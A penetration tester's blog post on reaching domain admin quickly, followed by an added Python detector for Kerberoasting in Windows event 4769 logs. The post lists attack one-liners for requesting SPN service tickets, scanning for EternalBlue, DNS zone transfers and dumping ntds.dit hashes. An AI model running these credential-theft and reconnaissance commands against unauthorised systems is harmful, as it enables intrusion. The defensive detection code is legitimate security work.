Jun 26, 2020
Today's episode is a fun tale of pentest pwnage! Interestingly, to me this pentest had a ton of time-sponging issues on the front end, but the TTDA (Time to Domain Admin) was maybe my fastest ever.
I had to actually roll a fresh Kali VM to upload to the customer site, and I learned (the hard way) to make that VM disk as lean as possible. I got away with a 15 gig drive, and the OS+tools+updates took up about 12 gig.
One of the biggest lessons I learned from this experience is to make sure that not only is your Kali box updated before you take it to a customer site (see this script), but you should make sure you install all the tool dependencies beforehand as well (specifically, Eyewitness, Impacket and MITM6).
This pentest was also extremely time-boxed, so I tried to get as much bang out of it as possible. This included:
- Requesting service tickets for SPN-bearing accounts with Impacket's GetUserSPNs.py:
  GetUserSPNs.py -request -dc-ip x.x.x.x domain/user
- Sweeping the subnet for hosts vulnerable to MS17-010 (EternalBlue):
  nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 -oA vulnerable-2-eblue
  and try this method of exploiting it
- Attempting a DNS zone transfer with dnsrecon:
  dnsrecon -d name.of.fqdn -t axfr
- Dumping password hashes from an offline copy of ntds.dit plus the SYSTEM hive with Impacket's secretsdump.py:
  sudo python ./secretsdump.py -ntds /loot/Active\ Directory/ntds.dit -system /loot/registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile /loot/ad-pw-dump
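A defender-side counterpart to the GetUserSPNs.py run above, added here as an example that is not part of the episode: it flags the burst of RC4 (etype 0x17) service-ticket requests that a bulk -request run leaves in Windows Security event 4769. The log lines, user names, service account names and addresses are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample of event 4769 (Kerberos service ticket requested) records,
# flattened to one line each the way a log forwarder might emit them.
# Accounts, service names and addresses are made up.
SAMPLE_LOG = """\
4769 Account Name: jdoe@CORP.LOCAL Service Name: svc_sql Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.5
4769 Account Name: jdoe@CORP.LOCAL Service Name: svc_web Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.5
4769 Account Name: jdoe@CORP.LOCAL Service Name: svc_backup Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.5
4769 Account Name: jdoe@CORP.LOCAL Service Name: krbtgt Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.5
4769 Account Name: alice@CORP.LOCAL Service Name: svc_sql Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.0.7
4769 Account Name: alice@CORP.LOCAL Service Name: svc_web Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.0.7
4769 Account Name: alice@CORP.LOCAL Service Name: svc_backup Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.0.7
4769 Account Name: bob@CORP.LOCAL Service Name: svc_sql Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.9
4769 Account Name: WS01$@CORP.LOCAL Service Name: WS02$ Ticket Encryption Type: 0x17 Client Address: ::ffff:10.0.0.11
4768 Account Name: jdoe@CORP.LOCAL Service Name: krbtgt Ticket Encryption Type: 0x12 Client Address: ::ffff:10.0.0.5
"""

EVENT_RE = re.compile(
    r"^4769 Account Name: (?P<account>\S+) Service Name: (?P<service>\S+) "
    r"Ticket Encryption Type: (?P<etype>0x[0-9A-Fa-f]+) Client Address: (?P<src>\S+)$"
)

# Ticket encryption types whose keys derive directly from the service
# account password: DES (0x1, 0x3) and RC4-HMAC (0x17). AES tickets are
# ignored here because they are the normal case in a modern domain.
WEAK_ETYPES = {"0x1", "0x3", "0x17"}


def parse_4769(line):
    """Return the fields of a 4769 line as a dict, or None for anything else."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


def kerberoast_suspects(log_text, min_services=3):
    """Map each requesting account to the sorted list of distinct service
    accounts it pulled weak-etype tickets for, keeping only accounts that
    reached min_services. krbtgt and machine accounts (trailing $) are
    skipped: their keys are random, so tickets for them are not crackable."""
    by_account = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_4769(line)
        if ev is None or ev["etype"].lower() not in WEAK_ETYPES:
            continue
        svc = ev["service"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        by_account[ev["account"]].add(svc)
    return {acct: sorted(s) for acct, s in by_account.items() if len(s) >= min_services}
```

Tune min_services to the environment; a legitimate user rarely needs RC4 tickets for several distinct service accounts within one log window.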